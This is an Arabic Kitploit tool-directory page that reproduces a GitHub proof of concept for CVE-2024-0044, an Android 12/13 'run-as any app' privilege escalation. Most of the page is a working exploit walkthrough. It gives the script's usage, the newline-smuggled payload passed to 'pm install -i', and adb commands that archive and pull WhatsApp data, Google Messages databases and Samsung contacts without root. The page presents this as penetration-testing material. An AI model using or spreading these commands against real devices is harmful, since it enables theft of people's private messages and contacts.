Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-0044 — CVE-2024-0044: ثغرة شديدة الخطورة من نوع "تشغيل أي تطبيق" تؤثر على إصدارات أندرويد 12 و13 | Kitploit
أدوات/GitHubGitHub/0xbinder/cve-2024-0044
أمان أندرويدتصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالالحركة الجانبيةتسريب البياناتما بعد الاستغلالاختبار الاختراقأمن الجوال
GitHub0xbinder/cve-2024-0044

CVE-2024-0044

CVE-2024-0044: ثغرة شديدة الخطورة من نوع "تشغيل أي تطبيق" تؤثر على إصدارات أندرويد 12 و13

32967منذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

CVE 2024 0044

ثغرة CVE-2024-0044، التي تم تحديدها في دالة createSessionInternal داخل ملف PackageInstallerService.java، هي ثغرة عالية الخطورة تؤثر على أندرويد 12 و13. تسمح هذه الثغرة للمهاجم بتنفيذ هجوم "run-as any app"، مما يؤدي إلى تصعيد الامتيازات المحلية دون الحاجة إلى تفاعل المستخدم. تنشأ المشكلة بسبب عدم التحقق السليم من المدخلات داخل دالة createSessionInternal. يمكن للمهاجم استغلال ذلك عن طريق التلاعب بعملية إنشاء الجلسة، مما قد يتيح له الوصول غير المصرح به إلى البيانات الحساسة وتنفيذ إجراءات غير مرخصة على الجهاز المتأثر.

تم اكتشاف الثغرة بواسطة Meta security

تم تلخيص إثبات المفهوم ومشاركته بواسطة Tiny hack

يمكن العثور على تفاصيل التصحيح الأمني في نشرة أمان أندرويد

المتطلبات الأساسية

  1. فعّل تصحيح أخطاء USB على هاتفك المحمول ووصّله بجهازك باستخدام كابل USB أو التصحيح اللاسلكي.
  2. قم بتنزيل أي ملف APK إلى جهازك، يمكنك استخدام F-DROID

كيفية استخدام الأداة

root@kitploit:~
python3 cve_2024_0044.py -h
                                                                               
##########################################################################################
###############S%%#####################################################%%S################
###############%++*S##################################################?++?################
################%++*S###############################################S*++?#################
#################%+++%#############################################S*++%##################
##################S*++%###########################################%+++%###################
###################S*++?#########SSS%%?????***?????%%%SS#########%++*S####################
#####################?++*##S%%?**+++++++++++++++++++++++**??%S##?++*S#####################
######################?++**+++++++++++++++++++++++++++++++++++**++*#######################
###################S%?*++++++++++++++++++++++++++++++++++++++++++++?%S####################
#################%?+++++++++++++++++++++++++++++++++++++++++++++++++++*%S#################
##############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++?S###############
############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S#############
##########S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S###########
#########%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##########
#######S*+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S########
######%++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*++++++++++++++%#######
#####%++++++++++++++*######%+++++++++++++++++++++++++++++++++%######?++++++++++++++?######
####?+++++++++++++++*######S+++++++++++++++++++++++++++++++++%######?+++++++++++++++?#####
###%+++++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*+++++++++++++++++?####
##S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%###
##*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S##
#%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##
#*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S#
S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%#      
        
usage: cve_2024_0044.py [-h] -P P -A A

CVE-2024-0044: run-as any app @Pl4int3xt

options:
  -h, --help  show this help message and exit
  -P P        package name (default: None)
  -A A        apk file path (default: None)

يُستخدم -P لتحديد اسم الحزمة الهدف الذي تريد تشغيل البرنامج بصلاحياته. يُستخدم -A لتحديد مسار ملف APK لدفعه إلى الجهاز.

الاستغلال

قم بتشغيل الأداة: python3 cve_2024_0044.py -P com.whatsapp -A /home/pl4int3xt/Downloads/F-Droid.apk

سيتم إنشاء ملف payload.txt على النحو التالي:

root@kitploit:~
PAYLOAD="@null
victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk

تقوم الأداة بأتمتة بعض الأجزاء بينما تظل الأجزاء الأخرى يدوية. يمكنك الخروج بعد إنشاء الحمولة وتشغيل جميع الأوامر يدويًا، أو متابعة التعليمات.

بعد ذلك، ستحتاج إلى الاتصال بجهازك باستخدام adb shell ولصق الحمولة، والتأكد من ظهور رسالة Success بعد الأمر الأخير.

root@kitploit:~
pl4int3xt ~>  adb shell
pixel:/ $ PAYLOAD="@null
> victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pixel:/ $ pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk
Success

بعد ذلك، نحصل على بيانات واتساب باستخدام الأوامر التالية:

root@kitploit:~
pixel:/ $ mkdir /data/local/tmp/wa/                                                                            
pixel:/ $ touch /data/local/tmp/wa/wa.tar
pixel:/ $ chmod -R 0777 /data/local/tmp/wa/
pixel:/ $ run-as victim
pixel:/data/user/0 $ tar -cf /data/local/tmp/wa/wa.tar com.whatsapp

أنشئ دليلاً مؤقتًا: mkdir /data/local/tmp/wa/ أنشئ ملفًا وهميًا لملف tar: touch /data/local/tmp/wa/wa.tar اضبط صلاحيات القراءة والكتابة والتنفيذ للجميع: chmod -R 0777 /data/local/tmp/wa/ لضمان قدرة أي مستخدم على القراءة والكتابة والتنفيذ داخل هذا الدليل. بدّل سياق المستخدم: run-as victim للحصول على نفس صلاحيات مستخدم الضحية. قم بأرشفة بيانات التطبيق الهدف: tar -cf /data/local/tmp/wa/wa.tar com.whatsapp، لإنشاء ملف tar من دليل بيانات واتساب.

أخيرًا، اسحب البيانات:

adb pull /data/local/tmp/wa/wa.tar

يمكنك استخراج البيانات باستخدام 7z أو أي أداة أخرى.

يمكنك استخدام مصدر محادثات واتساب لتحويلها إلى HTML.

يتيح لك ذلك الحصول على بيانات واتساب دون الحاجة إلى صلاحيات الجذر على جهازك.

سحب رسائل جوجل

فقط غيّر اسم الحزمة على النحو التالي:

root@kitploit:~
plaintext@archlinux ~/D/c/p/cve_2024_0044 (feature)> python3 ./cve_2024_0044.py -P com.google.android.apps.messaging -A ~/Down
loads/F-Droid.apk

اتبع التعليمات أعلاه، وبعد سحب ملف wa.tar قم بفك ضغطه وافتح المحادثات في com.google.android.apps.messaging/databases/bugle_db باستخدام sqlitebrowser أو أي أداة أخرى.

سحب جهات الاتصال

تم الاختبار على جهاز سامسونج. للأجهزة الأخرى، تحقق من اسم حزمة موفر جهات الاتصال.

root@kitploit:~
plaintext@archlinux ~/D/c/p/cve_2024_0044 (feature)> python3 ./cve_2024_0044.py -P com.samsung.android.app.contacts -A ~/Downloads/F-Droid.apk

اتبع التعليمات أعلاه، وبعد سحب ملف wa.tar قم بفك ضغطه وافتح جهات الاتصال في com.samsung.android.providers.contacts/databases/contacts2.db باستخدام sqlitebrowser أو أي أداة أخرى. يحتوي ملف قاعدة البيانات على جميع معلومات حسابات البريد الإلكتروني للمستخدم مع قائمة جهات الاتصال.

تنزيل الأداة